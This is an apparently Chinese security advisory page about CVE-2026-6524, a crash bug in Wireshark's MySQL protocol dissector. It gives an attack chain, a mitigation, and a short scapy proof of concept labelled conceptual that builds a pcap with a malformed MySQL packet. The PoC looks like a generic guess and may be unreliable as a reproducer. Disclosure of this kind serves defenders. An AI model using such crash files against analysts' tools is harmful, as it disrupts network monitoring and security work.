IPBUF安全漏洞报告
English
CVE-2026-6524 CVSS 5.5 中危

CVE-2026-6524 Wireshark MySQL协议解析器崩溃漏洞

披露日期: 2026-04-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-6524
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务Wireshark协议解析DoSCVE-2026-6524

漏洞概述

Wireshark是一款广泛使用的网络协议分析工具。该漏洞存在于其MySQL协议解析器中,影响4.6.0至4.6.4和4.4.0至4.4.14版本。由于解析器在处理特定MySQL协议数据包时存在逻辑缺陷,攻击者可以通过诱导用户打开特制的捕包文件或捕获恶意网络流量,触发解析器崩溃,从而导致应用程序停止响应,造成拒绝服务。

技术细节

该漏洞源于Wireshark MySQL协议解析器对畸形或特制数据包的处理机制存在缺陷。当解析器尝试解析特定构造的MySQL协议数据包(如异常的长度字段、标志位或Payload结构)时,未能正确处理边界条件或异常状态,导致空指针解引用、断言失败或内存访问越界。根据CVSS向量AV:L/AC:L/PR:N/UI:R,攻击路径通常需要本地网络访问权限(AV:L)及用户交互(UI:R)。攻击者可向目标网络环境发送恶意数据包,或诱骗分析师打开包含恶意数据包的.pcap文件。一旦Wireshark尝试解析该数据,主进程将立即崩溃。尽管该漏洞不影响数据的机密性和完整性(C:N/I:N),但会导致分析工具完全不可用(A:H),干扰网络运维与安全审计工作。

攻击链分析

STEP 1
步骤1:漏洞探测与准备
攻击者确认目标网络中使用的是存在漏洞的Wireshark版本(4.6.0-4.6.4 或 4.4.0-4.4.14),并构造能够触发MySQL解析器崩溃的特制数据包。
STEP 2
步骤2:投递恶意载荷
攻击者将恶意数据包发送至目标网络环境,或者将其封装在.pcap文件中,通过邮件、文件共享等方式发送给目标用户。
STEP 3
步骤3:触发解析
目标用户(网络管理员或分析师)使用Wireshark打开该恶意捕获文件,或在实时捕获中接收到攻击者发送的数据包。
STEP 4
步骤4:拒绝服务
Wireshark的MySQL协议解析器在处理畸形数据时发生异常,导致应用程序崩溃退出,无法继续进行流量分析。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Code for CVE-2026-6524 (Conceptual) # This script generates a pcap file containing a malformed MySQL packet. # Opening this file in a vulnerable Wireshark version should trigger a crash. from scapy.all import * # Construct a malformed MySQL packet # Standard MySQL packet: [Length (3 bytes)][ID (1 byte)][Payload] # We set an inconsistent length or payload to trigger the dissector bug malformed_payload = b"\x00\x00\x00" # Length 0 but with payload follows malformed_payload += b"\x01" # Sequence ID malformed_payload += b"\xFF" * 100 # Unexpected payload data # Encapsulate in TCP/IP ip_packet = IP(dst="127.0.0.1", src="192.168.1.1") tcp_packet = TCP(sport=3306, dport=54321) malformed_pkt = ip_packet / tcp_packet / Raw(load=malformed_payload) # Save to pcap file wrpcap("cve_2026_6524_crash.pcap", [malformed_pkt]) print("[+] PoC file generated: cve_2026_6524_crash.pcap") print("[+] Open this file with Wireshark 4.4.x - 4.6.x to reproduce the DoS.")

影响范围

Wireshark 4.6.0 to 4.6.4
Wireshark 4.4.0 to 4.4.14

防御指南

临时缓解措施
在无法立即升级软件的情况下,建议用户通过Wireshark的“编辑”->“首选项”->“协议”->“MySQL”路径,暂时禁用MySQL协议解析器(取消勾选“Enabled”选项)。此外,应避免在处理不可信流量时启用自动解析,并仅从可信来源获取网络捕获文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表